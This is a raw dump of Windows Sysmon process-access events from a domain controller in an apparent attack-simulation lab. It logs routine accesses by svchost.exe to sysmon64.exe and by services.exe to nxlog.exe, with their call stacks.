10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001348Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001347Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001346Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001345Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001344Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001343Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001342Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001341Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001340Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001339Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001338Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001337Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001336Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001335Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001334Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001333Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001332Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF7-5F80-0A00-000000007F01}8522564C:\Windows\system32\services.exe{733EE690-3E09-5F80-2D00-000000007F01}2896C:\Program Files (x86)\nxlog\nxlog.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001331Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001330Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001329Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001328Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001327Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001326Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001325Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 